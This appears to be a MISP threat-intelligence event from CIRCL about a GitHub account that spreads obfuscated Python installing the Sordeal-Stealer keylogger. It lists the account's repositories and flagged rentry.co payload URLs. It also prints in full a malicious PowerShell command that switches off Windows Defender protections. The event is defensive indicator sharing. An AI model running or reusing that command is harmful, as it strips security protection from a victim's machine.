2023-04-21 13:25:09 +00:00
{
2023-12-14 14:30:15 +00:00
"Event" : {
"analysis" : "2" ,
"date" : "2023-04-11" ,
"extends_uuid" : "" ,
"info" : "Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer" ,
"publish_timestamp" : "1681225627" ,
"published" : true ,
"threat_level_id" : "2" ,
"timestamp" : "1681225599" ,
"uuid" : "659a6331-0690-4b3b-ae16-e29a1fc31fc2" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#004646" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "type:OSINT" ,
"relationship_type" : ""
} ,
{
"colour" : "#0071c3" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0087e8" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#ffffff" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "tlp:white" ,
"relationship_type" : ""
} ,
{
"colour" : "#ffffff" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "tlp:clear" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "misp-galaxy:stealer=\"Sordeal-Stealer\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Alternative Protocol - T1048\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "misp-galaxy:mitre-attack-pattern=\"Browser Session Hijacking - T1185\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#075900" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "misp-galaxy:mitre-attack-pattern=\"Keylogging - T1056.001\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
2024-04-05 12:15:17 +00:00
"local" : false ,
2023-12-14 14:30:15 +00:00
"name" : "misp-galaxy:mitre-attack-pattern=\"GUI Input Capture - T1056.002\"" ,
"relationship_type" : ""
}
] ,
"Object" : [
{
"comment" : "Malicious account" ,
"deleted" : false ,
"description" : "GitHub user" ,
"meta-category" : "misc" ,
"name" : "github-user" ,
"template_uuid" : "4329b5e6-8e6a-4b55-8fd1-9033782017d4" ,
"template_version" : "3" ,
"timestamp" : "1681197484" ,
"uuid" : "8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"Attribute" : [
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "username" ,
"timestamp" : "1681197304" ,
"to_ids" : false ,
"type" : "github-username" ,
"uuid" : "a44cad97-d03e-48f3-8b7f-a1e71f384e06" ,
"value" : "okkz"
} ,
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "repository" ,
"timestamp" : "1681197304" ,
"to_ids" : false ,
"type" : "github-repository" ,
"uuid" : "f8feb7b6-3a90-47c8-89a4-1deaef564839" ,
"value" : "Tiktok-Username-Checker"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"data" : " / 9 j / 2 w C E A A g G B g c G B Q g H B w c J C Q g K D B Q N D A s L D B k S E w 8 U H R o f H h 0 a H B w g J C 4 n I C I s I x w c K D c p L D A x N D Q 0 H y c 5 P T g y P C 4 z N D I B C Q k J D A s M G A 0 N G D I h H C E y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M v / A A B E I A c w B z A M B I g A C E Q E D E Q H / x A G i A A A B B Q E B A Q E B A Q A A A A A A A A A A A Q I D B A U G B w g J C g s Q A A I B A w M C B A M F B Q Q E A A A B f Q E C A w A E E Q U S I T F B B h N R Y Q c i c R Q y g Z G h C C N C s c E V U t H w J D N i c o I J C h Y X G B k a J S Y n K C k q N D U 2 N z g 5 O k N E R U Z H S E l K U 1 R V V l d Y W V p j Z G V m Z 2 h p a n N 0 d X Z 3 e H l 6 g 4 S F h o e I i Y q S k 5 S V l p e Y m Z q i o 6 S l p q e o q a q y s 7 S 1 t r e 4 u b r C w 8 T F x s f I y c r S 0 9 T V 1 t f Y 2 d r h 4 u P k 5 e b n 6 O n q 8 f L z 9 P X 29 / j 5 + g E A A w E B A Q E B A Q E B A Q A A A A A A A A E C A w Q F B g c I C Q o L E Q A C A Q I E B A M E B w U E B A A B A n c A A Q I D E Q Q F I T E G E k F R B 2 F x E y I y g Q g U Q p G h s c E J I z N S 8 B V i c t E K F i Q 0 4 S X x F x g Z G i Y n K C k q N T Y 3 O D k 6 Q 0 R F R k d I S U p T V F V W V 1 h Z W m N k Z W Z n a G l q c 3 R 1 d n d 4 e X q C g 4 S F h o e I i Y q S k 5 S V l p e Y m Z q i o 6 S l p q e o q a q y s 7 S 1 t r e 4 u b r C w 8 T F x s f I y c r S 0 9 T V 1 t f Y 2 d r i 4 + T l 5 u f o 6 e r y 8 / T 19 v f 4 + f r / 2 g A M A w E A A h E D E Q A / A P N r s Z v b g n p u 4 / K o d p x V i 4 G + 6 m P / A E 0 N R t h V y T g V J q d Z 4 W K w a N N L I w V B K S S e w A F U b / V p t U Z o o S Y 7 H o e z T f 4 L / O q F s 9 x L Y R 20 p 22 y t v E e O X P X 5 v 8 A C r F X G P U i T 6 C A A A A D A F L R R W h m F F F F A B R R R Q A U U U U w C i i i g A o o o p A F F F F A B R R R T A K K K K A C i i i h g F F F F I A o o o o A K K S l o A K Q g M p U j I N L R Q M y L 1 L q D K / a J 5 I D k D d I T j P Y 574 N M T U 7 x J 45 h M W e N / M U s A f m y T z x z 95 u v r 7 C t h 0 W S M o 4 y D x W a d H u X n 2 W y i Q E g D 5 g O p w B + Z q H F L U d x w 1 u 5 E t j L 5 U L S W i u q l w S H D D B y M + n 680 l / q i a h b K k l q s b x r i M x v h Q T 944 I 74 H H Y 5 q t J p 97E5 R 7 a Q M A x x t P R c Z P u O R z 71E1 v c L k t B K A D g k o R g / l U X T A 3 W 1 z S J 0 t I 5 t F R V h X b I 0 W 0 G Q e X t x 0 H 8 Q B y c k c + t U p p d E k S 58 i y l h d i W h 3 M W 2 D a + F J B 5 + b Z z j s a y w c i l o S A m u o Y W u 7 n 7 J K i w K 58 o N u 5 X t / k 0 6 z 0 9 b u a W N r 62 h 2 b A G d g A 2 W A 4 J x 0 z k / T 8 a r 8 e g p M C q u K x u 2 / g 29 v F m a 0 v b K U Q q r P t c n B K s 2 O A c Y C E n N Z 13 o t 9 Y N O t w q A w H D 4 b P 8 Q X + Z q m B t 6 c Z 9 K f 5 k m w o J X 2 n q o P B 5 z 0 o C y 6 D O o o w R 0 N H S i g Y 5 m e Q g u 5 Y g Y G T m k p K W k A U U U U A F F F F A C E c 0 h 4 p 1 G K A J 7 V 1 i U 3 b X I E 9 q y N B C 6 F h J z z 9 M d f x r d g G s T J C I p r C U e U r L 8 h 4 A U j B I H X 5 / w D O K 56 C S O G d J J Y E n j U 5 a J y Q G H o S O a s 2 y W I T F 7 F e R y s d w M f A 2 E D H B 69 + a l o C G + j n i v H j u Y x H M o U N G P 4 e B x 9 e n 61 X r S a P S p I 3 c X E w c D j f g l 22 Z P H p n A z 71 H q l l b W E r R w 3 g u C G 42 g Y K 7 Q Q c g + 5 G P a m m S i j S g 0 l F M o 1 C D v l c 4 w X Y k / j S W s J u W E z g + U D 8 g P f 3 p f L + 0 S m B S T G r k y t 2 O S c L / j W i B g A d h 0 o j H q U 5 C / S i i i t T M K K K K A C i i i g A o o o p g F F F F A B R R R Q A U U U U A F F F F A B R R R S A K K K K A C i i i g A p G Y L j J x k 4 H 1 p a h u Y 2 k g Y J 98 c q f e g C a i m R O J Y U k A w G A P 0 p + P e g Y U U U U C C i i i g A p s i L J G Y 2 H y k c 0 6 i g Z A 7 p a l F T V r q N 8 c 5 J y q n s C R j H X v 7 U 4 s D d W z w 61 H M S + B 5 q F Q p w O u O 3 A 5 P r 9 a W 4 h 8 + E q M B w Q y E j o R y K y X u o 3 l u 2 u L S J X l L E B R t 8 p t p G A O e 5 B / C s X C z K u P b R L x E t H X y p F u 5 P K i M b 7 g z e m e l N u t I v r K 3 j n n g Z E k w V 7 k 5 B I O P T 5 W / I 1 J L d W k 1 v I A s 0 M q E v C A 3 y h i y d h w P l D 8 / S q w v 7 s r g 3 U x B Q x 4 Z y f l O e O e n U / m f W m D A 2 F 4 I I 5 z b y e V I M o w G d w 2 l v / Q Q T 9 B m o O V 5 I I + t W 11 O 9 W 2 W 384 t E i G N F K j 5 Q U Z M g 9 e F Z g O v W p b z W 769 j n S d o 284 B X I T B w G 3 A D 8 T + Q A o E Z + 6 j c O v 9 a e H h E W 0 2 + X x w 4 c 9 d u P 581 q 6 f c a G R p 8 F 9 Z u o V x 9 q n B P K 5 y c Y O c 9 B 0 45 o u B k d e R S V d u v 7 L J P 2 T z Q P J P 38 / w C s + T p 7 f f 8 A 0 q k M 4 o A K W k p a A C i i i g A o o o o A K M 0 U h o A U 1 e t t V v r W V b 5 b k P I k Z t l E h 3 E J j p g 9 q o n p U u + 2 + w G I 25 + 0 m U M J 9 / R M c r t 6 d e c 0 m P o b c s l 5 D J I 1 z p 1 r s 5 l w C D g B F 3 Y I 7 Y A J H u a h Z H Q s J d E D E b h K w w e B t B I x 0 P B 5 / w B q q U p s w k o E k y A l / L D E g k F B t B / H I P 4 V Z e N F W 4 i t d b Z 8 K 7 I m f 9 Z y P l z 78 / l U o z a s U 9 Q a 1 M o + y 2 s k C Z O V f r n 0 69 q p 1 Y v b i a e c i a c T F C Q H C 4 z z y a r 1 Z S O i g i W C F Y 15 x y T 6 n u T 9 a k o o r V C C i i i g A o o o o A K K K K Y B R R R Q A U U U U A F F F F A B R R R Q A U U U U A F F F F I A o o o p g F F F F I A p D S 0 h p g Q W 26 O W a I n 5 c 70 + h / 8 A r 5 q x V W 43 R z Q y o p Y 7 v L K j u D / k V Y R g 6 h h 0 I p A O o o o o A K K K K A C i l x x k U l A B 9 K g k s r G a Q S X U z W 4 Y 4 e U A k A 444 x 64 q w D g g 0 s 8 C S R n I B i k H c A 4 P 0 N J q 40 V b X Q L S f S r a 7 k 1 i C G W b / l i Q C Q d 6 r j r n O G 3 f g a g j 8 P X c 43 W 81 v I p 24 w 2 D y o b p + O K s 3 e s W R l m R / D 9 h G 5 w A V B G O Q e 349 + h r M L 6 S 7 k N a T L F k b d j Z Y D 5 c 9 T j s //AH17VlqNk02halbxh5YVVSpcN5i4IALHHPOAKqTWF7AzCa0mQKSCTGcZHXn8vzrRSXSTbSRpqOqwgq+I3AZWyu3aQDwCMr16VailWb9wPEnyS7lf7TFtBXLYyxORkBe/fHai4HOEFSAwwe4p2Mitx9JutQd7e1+x3AjQTCeGRmBARR5YJ7gAHk1mXenXVndRWrhWmkhEu1Dnau0tznocA/lTugKu3FLUj2t1G8SSW0yvKdsatGQWPoPU1GQyuyMrBlOGBHIPvQAUU0tjrx35pfxp2AWikB460ZpALRSZooAWkIzS0UAFSiFfsouBPEX8zy/I534xnd0xjt1qI9KQBS4yDj2pNDR0d/Lqge6M9tA53yNIysSAWjAOAew4b6iq93qtsWu4JtItoXdXXMYBMbEg5HHbGPxNS3EOjie4jtdSuLQCXYsLo5AXaPvDGeuRj0xTDo2m3B3/ANuwq7M25pcAkhwM4JzyCW5qRPUhhl0FrOKO5SUSqjjfECGJLjBbJxwuenFTRW3hh0zJqF6jbjwEzxk47dcYqodEmNzcQxyo3l8xk/8ALUb9vy4yOp9aZLoWqW8hjlgKsCR99ecHHr6g1QGtRRRWxIUUUUAFFFFABRRRTAKKKKACiiigAooooAKKKKQBRSUUDFqCGQyTT9cK+0fkKldgilieFGTVTSyz2SSv96Vmc/iTQIu0UUUAFFFFABRRRQBHMDs3r96Mh1+oOf6Vp6zYx2c8N9agmyvwHUDpG5GSPoaoYzxXV6LBDqvhOG0m+ZdrQt6qVOAfr0NTJ21NIK5ylRTzCGLzCpIGM47DPWpXhltriW1nGJYW2t7jsfxFIyhkZGHykYIqk7kNWYo5xSqrMGIBIXrVWzkZrYBvvISh+oq9aSFZdp5DjBFAmNjI3FW+6wpHUo20/nUjxASoVzsY4PtTipkhYH78Zx9RQJMr1YgZQm1uhPfsar1LDhg8Z6MKBmfr1oAEuYx/svj9D/MViV2DqLqwdD97BVvr/nmuQKlGKNwRwaiRSEIxRiiipAXJDZGQae11cvC0JuZvKbqgkIB7dPpxTKTFICyL+686CVpmZ4JPNRm5IY4yeev3RV+bxNfzpcLItuTOMMwjwR
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "profile-image" ,
"timestamp" : "1681197305" ,
"to_ids" : false ,
"type" : "attachment" ,
"uuid" : "3e89b7e6-26d9-49de-98b1-3ae980fc64f6" ,
"value" : "120434897.jpeg"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "bio" ,
"timestamp" : "1681197305" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "6e7d4203-2918-45c3-9397-ca3b49634700" ,
"value" : "Self-taught python & web developer."
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "link" ,
"timestamp" : "1681197305" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "0d38d67f-a087-4ae8-9069-263573cc2263" ,
"value" : "https://github.com/okkz"
} ,
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "repository" ,
"timestamp" : "1681197375" ,
"to_ids" : false ,
"type" : "github-repository" ,
"uuid" : "1a0a4867-9d67-4574-8705-129e7c31f2e2" ,
"value" : "Steam-ID-Checker"
} ,
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "repository" ,
"timestamp" : "1681197408" ,
"to_ids" : false ,
"type" : "github-repository" ,
"uuid" : "5024e29c-3a86-411d-a701-4d592ef8723c" ,
"value" : "Tiktok-Username-Checker"
} ,
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "repository" ,
"timestamp" : "1681197431" ,
"to_ids" : false ,
"type" : "github-repository" ,
"uuid" : "4bf6f9ab-9075-4dcb-aa63-16eeaa09d7cd" ,
"value" : "lure-s-tiktok-username-checker-LEAKED"
} ,
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "repository" ,
"timestamp" : "1681197456" ,
"to_ids" : false ,
"type" : "github-repository" ,
"uuid" : "561aca94-5e64-4d6d-9a3b-f4cc069e8390" ,
"value" : "Steam-ID-Checker"
} ,
{
"category" : "Social network" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "repository" ,
"timestamp" : "1681197484" ,
"to_ids" : false ,
"type" : "github-repository" ,
"uuid" : "3ba60ac3-5ad9-4225-950a-df5c4f002e38" ,
"value" : "Discord-Token-Checker"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts." ,
"meta-category" : "misc" ,
"name" : "script" ,
"template_uuid" : "6bce7d01-dbec-4054-b3c2-3655a19382e2" ,
"template_version" : "7" ,
"timestamp" : "1681198987" ,
"uuid" : "508397b3-2a52-4012-9969-f63c7d4f3872" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "script" ,
"timestamp" : "1681198987" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "18a4a4e3-f8df-4905-8f78-9086fdb5be01" ,
"value" : "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "language" ,
"timestamp" : "1681198987" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "570050a4-bba2-4b4d-8884-5e7dcaad668b" ,
"value" : "PowerShell"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "comment" ,
"timestamp" : "1681198987" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "b671719d-5b41-4b14-821a-6d35279f1f90" ,
"value" : "Fetched from https://rentry.co/shitbymyself/raw"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1681198987" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "dbe16379-285a-4592-93f1-d70d657d9a3c" ,
"value" : "Malicious"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata." ,
"meta-category" : "network" ,
"name" : "url" ,
"template_uuid" : "60efb77b-40b5-4c46-871b-ed1ed999fce5" ,
"template_version" : "9" ,
"timestamp" : "1681200514" ,
"uuid" : "abf89a2e-30f6-460f-80de-1556fb9aceb7" ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "url" ,
"timestamp" : "1681200514" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "0219ad8f-579c-4bbf-97c9-582b81c67507" ,
"value" : "https://rentry.co/shitonyourAV/raw"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata." ,
"meta-category" : "network" ,
"name" : "url" ,
"template_uuid" : "60efb77b-40b5-4c46-871b-ed1ed999fce5" ,
"template_version" : "9" ,
"timestamp" : "1681200522" ,
"uuid" : "6040acc9-ef3c-40ac-b38b-47ebfacd06e4" ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "url" ,
"timestamp" : "1681200522" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "749d9d77-faaf-4834-9342-4a50e98b945b" ,
"value" : "https://rentry.co/shitbymyself/raw"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata." ,
"meta-category" : "network" ,
"name" : "url" ,
"template_uuid" : "60efb77b-40b5-4c46-871b-ed1ed999fce5" ,
"template_version" : "9" ,
"timestamp" : "1681200530" ,
"uuid" : "ea61ae8e-8a2c-435e-811d-e1967ee7d111" ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "url" ,
"timestamp" : "1681200530" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "ae69ac2a-e85b-49b3-ac7c-65069043d600" ,
"value" : "https://rentry.co/9ops5/raw"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata." ,
"meta-category" : "network" ,
"name" : "url" ,
"template_uuid" : "60efb77b-40b5-4c46-871b-ed1ed999fce5" ,
"template_version" : "9" ,
"timestamp" : "1681200539" ,
"uuid" : "8265c383-09dc-447c-b9b8-ba17d1b765ff" ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "url" ,
"timestamp" : "1681200539" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "6772760d-c9ac-4300-8ab5-2d4aaa230a85" ,
"value" : "https://rentry.co/khsph/raw"
}
]
}
] ,
"EventReport" : [
{
"name" : "Notes" ,
"content" : "The GitHub account [okkz](@[suggestion](https://github.com/okkz)) hosting a series of repository with malicious Python code. The code is obfuscated and install/execute a keylogger called [Sordeal-Stealer](https://github.com/SOrdeal/)." ,
"id" : "150" ,
"event_id" : "155915" ,
"timestamp" : "1681225599" ,
"uuid" : "bbeedf0d-072f-4551-b886-b9c57f50137f" ,
"deleted" : false
}
2023-04-21 13:25:09 +00:00
]
2023-12-14 14:30:15 +00:00
}
2023-04-21 13:25:09 +00:00
}
